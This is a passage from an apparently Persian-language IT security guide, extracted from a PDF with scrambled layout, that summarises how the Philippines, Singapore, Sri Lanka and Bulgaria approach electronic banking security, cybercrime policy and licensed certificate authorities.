ﺑﺮ ﻣﺒﻨﺎﻱ ﭼﻜﻴﺪﺓ ﺟﻠﺴﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎﻱ ﻓﻌﺎﻝ ﺻـﻨﻌﺘﻲ
ﻭ ﻣﻘﺎﻣﺎﺕ ﺩﻭﻟﺘﻲ ﻫﺪﺍﻳﺖ ﻣﻲ ﺷﻮﺩ .ﻳﻜـﻲ ﺍﺯ ﭘﺮﺳـﺸﻬﺎﻱ ﺍﺻـﻠﻲ
ﺳﻨﮕﺎﭘﻮﺭ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻨﻬـﺎ ﻳـﻚ ﻧﻬـﺎﺩ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ
ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﺩﻭﻟﺘﻲ ﺑﻪ ﺑﺰﺭﮔ ﹺ
ﺑﺎ ﺩﺍﺷﺘﻦ ﻣﺮﺍﺟﻊ ﻣﺘﻌﺪﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ،ﻣﻲﺗﻮﺍﻧﺪ ﺿﻮﺍﺑﻂ ﺧﻮﺩ ﺭﺍ
ﺑﺼﻮﺭﺕ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻋﻤﺎﻝ ﻛﻨﺪ.
ﻓﻴﻠﻴﭙﻴﻦ
ﺑﺤﺚ ﻓﻴﻠﻴﭙﻴﻦ ﺭﻭﻱ ﻧﺘﺎﻳﺞ ﺳﻪ ﻧﮕـﺮﺵ ﻣﻤﻜـﻦ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺷـﺪ
ﻓﺰﺍﻳﻨﺪﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ .ﺍﻳﻦ ﺳـﻪ ﻧﮕـﺮﺵ
ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ ﮔﺴﺘﺮﺵ ﻭﻳﺮﻭﺳﻬﺎ )ﻣﺜـﻞ ﻭﻳـﺮﻭﺱ ،(I Love You
ﺳﺮﻗﺖ ﻣﺪﺍﻭﻡ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﻧﻴﺰ ﺣﺎﺩﺛﺔ ﻳﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ.
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛـﺸﻮﺭ ﻓﻴﻠﻴﭙـﻴﻦ ﺍﺯ ﺣﺎﺩﺛـﺔ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑـﺮﺍﻱ
ﺗﺸﺮﻳﺢ ﻣﺤﺎﺳﺒﺎﺕ ﺩﻭﻟﺖ ﺧﻮﺩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ
ﺍﻗﺘﺼﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ.
ﺩﺭ ﻓﻴﻠﻴﭙــﻴﻦ ،ﮔــﺴﺘﺮﺵ ﻭﻳــﺮﻭﺱ " "I Love Youﺑــﺴﺮﻋﺖ
ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑـﻪ ﻭﺍﻛـﻨﺶ ﻭﺍﺩﺍﺭ ﻛـﺮﺩ .ﺍﻳـﻦ ﺣﺎﺩﺛـﻪ ﺍﺯ ﺁﻥ
ﺟﻬــﺖ ﻛــﻪ ﺿــﻌﻔﻬﺎﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺭﺍ ﻓــﺎﺵ
ﻣــﻲﺳــﺎﺧﺖ ﺍﺯ ﺍﻫﻤﻴــﺖ ﻭﻳــﮋﻩﺍﻱ ﺑﺮﺧــﻮﺭﺩﺍﺭ ﺑــﻮﺩ .ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ
233 Licensed Certificate Authorities
ﻲ ﻓﻬﻢ ﻭ ﻭﺍﻛﻨﺶ ﻣﺆﺛﺮ ﺑﻪ ﺣﻮﺍﺩﺙ
ﻫﻤﭽﻨﻴﻦ ﻇﺮﻓﻴﺖ ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧ ﹺ
ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑﻪ ﻣﻨﺼﺔ ﻇﻬﻮﺭ ﺭﺳـﺎﻧﺪ ﻭ ﺩﺭ ﻧﺘﻴﺠـﺔ ﻳـﻚ
ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻭﻟﺖ ﺑﻪ ﺍﺟﺮﺍ ﮔﺬﺍﺷﺘﻪ ﺷﺪ
ﻭ ﺩﻭﻟﺖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺳﺎﻳﺒﺮ ٢٣٤ﺭﺍ ﺍﺯ ﺩﺍﻳﺮﺓ ﺗﺼﻮﻳﺐ ﮔﺬﺭﺍﻧﺪ.
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ
ﻞ
ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ )ﻣﺜﻞ ﻫﺮ ﻛﺸﻮﺭ ﺩﻳﮕﺮﻱ( ﺑﻪ ﻳﻚ ﻣﻌـﻀ ﹺ
ﺍﺳﺎﺳﻲ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺩﺍﺭﺍﻱ ۲ﺗـﺎ ۳ﻣﻴﻠﻴـﻮﻥ
ﺩﺍﺭﻧــﺪﺓ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺍﺳــﺖ ﻭ ﺣــﺪﻭﺩ ۱۷ﺑﺎﻧــﻚ ،ﺧــﺪﻣﺎﺕ
ﺍﻋﺘﺒﺎﺭﻱ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺳﺎﻝ ﭼﻨﺪﻳﻦ ﻣﻴﻠﻴـﻮﻥ
ﺗﺒﺎﺩﻝ ﺗﺠﺎﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ .ﺗﺨﻤﻴﻦ ﺯﺩﻩ ﺷﺪﻩ ﻛﻪ
ﺣﺪﻭﺩ ۴۰۰ﻣﻴﻠﻴﻮﻥ ﭘﺰﻭ )ﻣﻌﺎﺩﻝ ۸ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ( ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ
ﻣﺎﻟﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺻﻮﺭﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ
ﺍﻋﺘﺒــﺎﺭﻱ ﻧــﺴﺒﺖ ﺩﺍﺩ .ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺧــﻮﺩﭘﺮﺩﺍﺯ ﻧﻴــﺰ ﺑﻄــﻮﺭ
ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺳﺮﺍﺳـﺮ ﻛـﺸﻮﺭ ﭼﻴـﺰﻱ
ﺣﺪﻭﺩ ۱۰ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ.
ﺳﻮﻣﻴﻦ ﻣﻮﺿﻮﻉ ﺑﺤﺚ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑﺎﻧﻜﻬـﺎ ﺭﺍ
ﻣﺠﺒﻮﺭ ﺳﺎﺧﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﺗـﻼﺵ
ﺟﻬﺖ ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ.
ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺟﻬﺎﻥ ،ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻢ ﻫﻨﻮﺯ
ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﻪ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ .ﻓﻴﻠﻴﭙـﻴﻦ ﺩﺭ ﺍﻳـﻦ ﺭﺍﺳـﺘﺎ ﺑـﻪ
ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻫﺸﺖ ﺭﻛﻦ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺰ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ :ﭘﻴﻮﻧﺪ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ
ﺭﻭﺷﻬﺎﻱ ﺍﻋﻤﺎﻝ ﺿـﻮﺍﺑﻂ ،ﺑﺮﻗـﺮﺍﺭﻱ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ
ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ،ﻭ ﻧﻴﺰ ﺑﻬﺒﻮﺩ ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻱ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ
ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ .ﺑﺎ ﺍﻳﻨﻬﻤﻪ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻨـﻮﺯ ﻧﻴﺎﺯﻣﻨـﺪ
ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺧﺒــﺮﺓ ﻗــﺎﻧﻮﻧﻲ ،ﺑﺨــﺼﻮﺹ ﺑــﺮﺍﻱ ﺩﺍﺩﮔﺎﻫﻬــﺎﻱ
ﺗﺨﺼﺼﻲ ﺍﺳﺖ .ﺍﺯ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻫـﺎﻱ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺁﻣﻮﺯﺵ ﻛﻠﻴﺔ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺷﺎﻣﻞ ﻣﺸﺘﺮﻳﺎﻥ ،ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ،ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ
ﺧﺪﻣﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﻓﻴﻠﻴﭙﻴﻨﻲ ﻫﺎ ﺩﻭ ﺳﺆﺍﻝ ﻋﻤﺪﻩ ﻣﻄﺮﺡ ﻛﺮﺩﻧـﺪ (۱ :ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ
ﭼﮕﻮﻧﻪ ﻣﻴﺎﻥ ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩﻫﺎ ﻭ ﺣﻔﻆ ﻣﺴﺎﺋﻞ ﻣﺤﺮﻣﺎﻧﻪ ،ﺗـﻮﺍﺯﻥ
ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟ ﻭ (۲ﺟﺎﻳﮕﺎﻩ ﭘﻠـﻴﺲ ﺑـﻴﻦﺍﻟﻤﻠـﻞ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ
ﺟﺮﺍﺋﻢ ﺟﺰﺍﻳﻲ ﭼﻴﺴﺖ؟
234 Cyber-Strategy
ﺑﺨﺶ ﺳﻮﻡ
ﺁﮔﻮﺳــﺖ ﺳــﺎﻝ ﮔﺬﺷــﺘﻪ ﭼﻨــﺪ ﺷــﺮﻛﺖ ﻭﺍﺳــﻄﻪﺍﻱ ﺣــﺴﺎﺑﻬﺎﻱ
ﻏﻴﺮﻓﻌــﺎﻝ ﻭ ﻣــﺴﻜﻮﺗﻲ ﺭﺍ ﻳﺎﻓﺘﻨــﺪ ﻛــﻪ ﺗﻨﻬــﺎ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ
ﻛﺎﺭﻫــﺎﻱ ﺧــﻮﺩ ﺣــﺪﻭﺩ ۲۰ﻣﻴﻠﻴــﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜــﺎ ﺳــﻬﺎﻡ ﺍﺯ
ﺳـﺮﻣﺎﻳﻪﮔــﺬﺍﺭﺍﻥ ﺧﺮﻳـﺪﻩ ﺑﻮﺩﻧــﺪ .ﺩﺭ ﻭﺍﻛــﻨﺶ ﺑـﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ،
ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓـﺖ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺟﺒﺎﺭ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺩﺭ ﺍﻭﻝ ﺩﺳﺎﻣﺒﺮ ﺳﺎﻝ
،۲۰۰۲ﮔﻮﺍﻫﻲﻫﺎﻱ ﺧﺼﻮﺻﻲ "ﻓﺎﻗﺪ ﺍﻋﺘﺒـﺎﺭ" ﺍﻋـﻼﻡ ﺷـﺪﻧﺪ ﻭ ﺍﺯ
ﺁﻥ ﭘﺲ ﺗﻨﻬﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ
) ٢٣٣(LCAsﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻣﻌﺘﺒﺮ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪﻧﺪ ﻭ ﺗﺎ ﻣﺎﻩ
ﻣﻲ ﺳﺎﻝ ۲۰۰۳ﻧﻴﺰ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺠﺪﺩ ﻗـﺮﺍﺭ
ﻣﻲ ﮔﺮﻓﺘﻨﺪ .ﺿﺮﻭﺭﻱ ﺷـﺪ ﻛـﻪ ﻫﻤـﺔ ﺷـﺮﻛﺘﻬﺎﻱ ﻭﺍﺳـﻄﻪﺍﻱ ﺍﺯ
ﻧﻮﺍﻣﺒﺮ ۲۰۰۲ﻭ ﻣﺆﺳﺴﺎﺕ ﻛﻮﭼﻜﺘﺮ ﺍﺯ ﮊﺍﻧﻮﻳﻪ ۲۰۰۳ﺑـﻪ ﺑﻌـﺪ ،ﺩﺭ
ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
٢١٩
٢٢٠
ﺳﺮﻳﻼﻧﻜﺎ
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺳﺮﻳﻼﻧﻜﺎ ﺻﺤﺒﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘـﻴﺶﺯﻣﻴﻨـﻪﺍﻱ ﺍﺯ
ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺑﺤـﺚ ﺩﺭﺑـﺎﺭﺓ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﮔـﺴﺘﺮﺵ
ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ .ﺁﻧﻬﺎ ﻋﻘﻴﺪﻩ ﺩﺍﺷـﺘﻨﺪ
ﻛﻪ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻪ ﺯﻭﺩﻱ ﺣﻞ ﺧﻮﺍﻫﻨﺪ
ﺷﺪ ﻭ ﻣﺸﻜﻞ ﻋﺪﻡ ﺁﮔﺎﻫﻲ ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﺩﺭ ﺳﻄﺢ ﻣـﺪﻳﺮﻳﺖ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺟﻠـﺐ ﺣﻤﺎﻳـﺖ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ
ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﻧﻘﻄﻪﺿﻌﻒ ﺩﻳﮕﺮﻱ ﻛـﻪ
ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺩﺭ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎﻓـﺖ ،ﻋـﺪﻡ ﺁﮔـﺎﻫﻲ ﺍﺯ ﻧﺤـﻮﺓ
ﺍﻧﺠﺎﻡ ﻳﻚ ﻣﻌﺎﻣﻠﺔ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﻋﺘﻤـﺎﺩ ﻣﻴـﺎﻥ
ﻣﺸﺘﺮﻳﺎﻥ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻛﻤﺘﺮ ﻣﺎﻳﻞ ﺑـﻪ ﺷـﺮﻛﺖ ﺩﺭ ﻣﻌـﺎﻣﻼﺕ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﺠﺎﺩ ﻭ ﺍﺭﺍﺋﻪ ﺧﻂﻣﺸﻲﻫﺎ ﻭ ﻣﺒﺎﻧﻲ ﻛﺎﺭﻱ ﺑـﻪ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﻣـﺸﺘﺮﻳﺎﻥ
ﻫﻢ ﻛﻤﻚ ﻛﻨﺪ.
ﭘﺮﺳﺶ ﺳﺮﻳﻼﻧﻜﺎ ﻣﺘﻮﺟﻪ ﻓﺮﺍﻫﻢﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑـﻮﺩ.
ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﺳﺘﻨﺪ ﺑﺪﺍﻧﻨﺪ ﻛـﻪ ﺁﻳـﺎ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﺭﺳـﻤﻲ ﻭ ﻣﺒـﺎﻧﻲ
ﻛﺎﺭﻱ ﺑﺮﺍﻱ ISPﻫﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫـﺪ
ﺩﺍﺷﺖ ﻳﺎ ﺧﻴﺮ .ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺧﻮﺍﺳﺘﺎﺭ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ
ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻛﺮﻩ ﺷﺪﻧﺪ -ﺍﻳﻨﻜـﻪ ﺁﻳـﺎ ﺧـﺼﻮﺻﻲ ﻳـﺎ ﺩﻭﻟﺘـﻲ
ﺍﺳﺖ ،ﻭ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻘﺸﻬﺎﻳﻲ ﺭﺍ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ.
ﺑﻠﻐﺎﺭﺳﺘﺎﻥ
ﺧﺪﻣﺎﺕ ﻧﻮﻳﻦ ﺑـﺎﻧﻜﻲ ﺑﻠﻐﺎﺭﺳـﺘﺎﻥ ﺩﺭ ﺳـﺎﻝ ۱۹۸۹ﺑـﺎ ﻓﺮﻫﻨﮕـﻲ
ﻣﺸﺎﺑﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺍﺭﻭﭘﺎ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪ .ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺷﺎﻣﻞ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺑﻮﺩ )ﺑﺮﺍﻱ ﻣﺜـﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ BANKNETﺍﺷـﺎﺭﻩ ﻛـﺮﺩ(.
ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳﺆﺍﻻﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﺍﻳﻨﻜﻪ "ﭼﻪ ﭼﻴﺰﻱ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﺷﻮﺩ" ﺁﻏﺎﺯ ﻛﺮﺩ ،ﻭ ﺳﭙﺲ ﻋﻨﺎﺻﺮ
ﺣﻴــﺎﺗﻲ ﺍﻳﻨﻜــﺎﺭ -ﻣﺜــﻞ ﺷــﺒﻜﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ ،ﺳﻴــﺴﺘﻤﻬﺎﻱ
ﺍﻃﻼﻋﺎﺕ ﺩﺍﺧﻠﻲ ،ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ
)ﻋﻠﻲﺍﻟﺨﺼﻮﺹ ﺩﺍﺩﻩﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ( -ﺭﺍ ﻣﻌﺮﻓـﻲ
ﻧﻤﻮﺩ.
ﺍﺯ ﺑﻌﺪ ﺳﺎﺯﻣﺎﻧﻲ ،ﺑﻠﻐﺎﺭﺳـﺘﺎﻥ ﻳـﻚ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ ﺩﺍﺷـﺖ ﻛـﻪ
ﻣﺴﺌﻮﻝ ﺗﺤﻠﻴﻞ ﻭ ﺍﺭﺍﺋﻪ ﺭﺍﻫﻜﺎﺭﻫﺎ ﺑﻮﺩ .ﺗـﺪﻭﻳﻦ ﺧـﻂﻣـﺸﻲﻫـﺎﻱ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺎﺯﻣﻨﺪ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪﻫـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﻭ
ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻪﺭﻭﺯ
ﻭ ﻓﻬﺮﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﺎﺹ ﻭ ﭘﻴﭽﻴـﺪﻩ ﺍﺳـﺖ .ﺑﻠﻐﺎﺭﻫـﺎ ﺍﻳﻤﻨـﻲ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺭﺍ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻣﻲﺩﺍﻧﻨﺪ .ﺗﻐﻴﻴﺮﺍﺕ ﻧﻈﺎﺭﺗﻲ
ﻭ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ -ﻳﻜﻲ ﺍﺯ ﺍﺟـﺰﺍﻱ ﻣﻬـﻢ
ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ -ﻧﻴﺰ ﻣﻲﺷـﻮﺩ .ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﺎﺭﻩ
ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﻣﺒﺎﻧﻲ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ )ﻣﺸﺘﻤﻞ
ﺑﺮ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻓﻨﻲ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻛﺎﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ( ﻫﻤﭽﻨـﺎﻥ ﻛـﺎﺭ
ﻛﻨﻨﺪ.
ﺩﺭ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻣـﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
